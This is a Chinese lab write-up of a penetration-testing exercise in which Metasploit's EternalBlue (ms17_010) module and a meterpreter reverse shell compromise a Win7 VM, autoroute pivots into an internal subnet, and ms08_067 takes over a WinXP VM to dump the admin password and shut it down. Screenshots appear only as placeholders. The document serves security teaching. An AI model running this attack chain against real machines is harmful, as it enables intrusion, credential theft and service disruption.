一、实验项目名称windows网络服务渗透测试实战-跨网段攻击
二、实验目的及要求掌握对跨网段攻击的方法 。
熟悉Metasploit终端的使用方法 。
熟悉通过meterpreter进行后渗透操作
获取winxp系统管理员admin的密码,并使xp系统关机
----基础配置----
1、选择win7
文章插图
文章插图
文章插图
文章插图
2、选择winXP
文章插图
文章插图
3、选择kali
文章插图
文章插图
4、查看kali的ip
文章插图
5、查看winXP的ip
文章插图
6、查看win7的IP
文章插图
总结如下:
WinXP
Win7
Kali
【Windows网络服务渗透测试实战-跨网段攻击】网络适配器 桥接模式(自动)
192.168.43.99
网络适配器 桥接模式(自动)
192.168.43.89
网络适配器 NAT
192.168.232.128
网络适配器2 NAT
192.168.232.145
----开始跨网段攻击----
1、输入 msfconsole 启动metasploit
文章插图
2、使用“永恒之蓝”的漏洞模块,使用扫描命令进行网段内主机扫描
use
auxiliary/scanner/smb/smb_ms17_010 //进入扫描模块
set rhosts (目标网段) //扫描目标网段内的主机
set threads 512 //设置扫描线程
run //执行
文章插图
3、设置攻击步骤进行攻击
use
exploit/windows/smb/ms17_010_eternalblue //利用攻击模块
set rhost (目标IP) //设置目标IP
set lhost (监听主机IP) //设置监听IP
set payload
windows/x64/meterpreter/reverse_tcp //设置攻击载荷
run
文章插图
4、通过meterpreter终端获取系统控制台shell,执行ipconfig发现主机存在双网段
文章插图
5、获取shell权限,在cmd窗口试图下输入 arp -a 可以发现,存在同网段的地址
文章插图
6、返回meterpreter终端将内网网段192.168.232.128/24添加值路由表
run autoroute -s 192.168.232.128/24
run autoroute -p //查看路由表状况
文章插图
7.使用 background 退出到msf试图,并搜索 ms08-067 ,此处可以看到内网主机是XP系统,直接使用 ms08- 067 进行攻击
backgroup
search ms08-067
use
exploit/windows/smb/ms08_067.NETapi //利用攻击模块
set payload
windows/meterpreter/bind_tcp //设置攻击载荷
set rhost (目标IP) //设置监听IP
run
文章插图
文章插图
8、获取winxp系统管理员admin的密码
文章插图
9、使xp系统关机
文章插图
文章插图
文章插图
关机之后kali中会失去会话
推荐阅读
- windows中无法访问共享问题
- linux与windows的区别
- Windows许可证即将过期怎么办
- 重装win7教程 卡在“正在启动Windows”
- Windows10 的PIN密码是什么?如何设置和取消PIN
- Windows正确录屏的5个方法 电脑录屏怎么录
- kali-11身份认证攻击
- windows10如何设置桌面图标
- 如何解决Windows上的ERR
- 黑客与红客|新手入门渗透测试思路